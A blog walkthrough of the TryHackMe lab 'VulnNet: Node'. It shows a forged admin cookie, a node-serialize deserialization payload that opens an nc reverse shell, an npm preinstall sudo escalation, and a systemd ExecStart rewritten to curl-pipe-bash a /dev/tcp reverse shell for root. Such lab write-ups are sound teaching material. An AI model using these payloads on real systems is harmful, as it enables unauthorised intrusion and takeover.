TryHackMe:VulnNet: Node

Today we will take a look at TryHackMe:VulnNet: Node. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
sudo nmap -p- -sCV --open 10.10.41.219PORT     STATE SERVICE VERSION
8080/tcp open http Node.js Express framework
|_http-title: VulnNet – Your reliable news source – Try Now!
|_http-open-proxy: Proxy might be redirecting requests
  • Web

When we first look at it, it greets us as a guest.

Let’s refresh the page and catch the request with burpsuite.

When we look at the request, we see that the website gives us cookie. Let’s decode and look at the contents.

Url → Base64

We see that he marks us as guests. Replacing with admin and sending the request again.

We see that the response is “Welcome Admin”. It worked. But when we try to log in, we see that he wants the password again.

I received such an answer when I changed the cookie.

I pasted the sentence on Google. There is such an article.

It’s time to get the reverse shell.

  • Reverse Shell
{"username":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()","isAdmin":true,"encoding": "utf-8"}

Encode and send request.

Listen:

Command: nc -nvlp 4444

  • serv-manage

After logging in:

Command: script /dev/null -c bashCommand: export TERM=xtermCtrl + zCommand: stty raw -echo ; fgCommand: resetwww@vulnnet-node:~/VulnNet-Node$ sudo -l
Matching Defaults entries for www on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www may run the following commands on vulnnet-node:
(serv-manage) NOPASSWD: /usr/bin/npm
www@vulnnet-node:~/VulnNet-Node$ mkdir exploitwww@vulnnet-node:~/VulnNet-Node$ echo '{"scripts": {"preinstall": "/bin/bash"}}' > exploit/package.jsonwww@vulnnet-node:~/VulnNet-Node$ sudo -u serv-manage npm -C exploit --unsafe-perm i
  • Root
serv-manage@vulnnet-node:/home/www/VulnNet-Node/exploit$ sudo -l
Matching Defaults entries for serv-manage on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User serv-manage may run the following commands on vulnnet-node:
(root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl daemon-reload
serv-manage@vulnnet-node: locate vulnnet-auto.timerserv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-auto.timer--------------------------------
[Unit]
Description=Run VulnNet utilities every 30 min

[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/30
Unit=vulnnet-job.service

[Install]
WantedBy=basic.target
--------------------------------
serv-manage@vulnnet-node: locate vulnnet-job.serviceserv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-job.service---------------------------------
[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer

[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/df

[Install]
WantedBy=multi-user.target
---------------------------------

We see something like this here. “ExecStart = / bin / df” Here we can execute the command and get the reverse shell.

First, let’s prepare a payload on our own machine.

Exploit.sh

$ nano exploit.sh#!/bin/bashbash -i >& /dev/tcp/Your_IP/4242 0>&1

Command: python3 -m http.server 80

In the target machine

ExecStart=/bin/bash -c "curl http://Your_İP/exploit.sh | bash"

Local machine:

Command: nc -nvlp 4242

In the target machine

serv-manage@vulnnet-node: sudo -u root /bin/systemctl stop vulnnet-auto.timerserv-manage@vulnnet-node: sudo -u root /bin/systemctl start vulnnet-auto.timer

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to create a CRUD operation using MongoDB and NodeJS?

HashTag JavaScript: Execution Context and Call Stack

A reflection on Map and Object in JS

App Icon in React Native (IOS and Android)

GitHub Commit Booster using Node.js and React.js

Optimize your ReactJS code like a Pro

OpenAPI and JSON Schema Divergence: Part 1

Vue.js — There and Back Again in 1.5 years

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Tryhackme Wonderland

Steel Mountain ⛰ TryHackMe | Walkthrough

Internal — THM Walkthrough